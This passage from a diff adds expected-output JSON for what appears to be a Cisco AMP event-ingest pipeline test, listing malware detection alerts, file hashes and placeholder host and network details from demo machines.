+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581755886Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196240",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:37.000Z",
+            "file": {
+                "name": "webinstall.exe",
+                "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe",
+                "hash": {
+                    "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0",
+                    "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "md5": "e9d8c15e7d18678dd41771f72ed6693c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Dyre"
+                ],
+                "hash": [
+                    "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "e9d8c15e7d18678dd41771f72ed6693c",
+                    "ec80314ae4a2817be806b7ae27dbdb31a88226a0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Dyre",
+                "hostname": "Demo_Dyre"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581757773Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6176259080131183000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "GenericKD:Dyreza-tpd",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "23:d5:92:eb:f8:9b",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "23:d5:92:eb:f8:9b"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6176259080131182683",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:37.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581759663Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251507855229000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251507855228943",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:37.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581761565Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251507855229000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.3372C1EDAB-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251503560261641",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:36.000Z",
+            "file": {
+                "name": "t.exe",
+                "path": "\\\\?\\C:\\t.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581763451Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251503560262000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.3372C1EDAB-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251503560261640",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "t.exe",
+                "pid": 2712,
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "@timestamp": "2021-01-15T10:17:36.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581765334Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251503560262000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.3372C1EDAB-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251503560261639",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:36.000Z",
+            "file": {
+                "name": "t.exe",
+                "path": "\\\\?\\C:\\t.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581767207Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251503560262000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.3372C1EDAB-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251503560261638",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "t.exe",
+                "pid": 2712,
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "@timestamp": "2021-01-15T10:17:36.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581769170Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e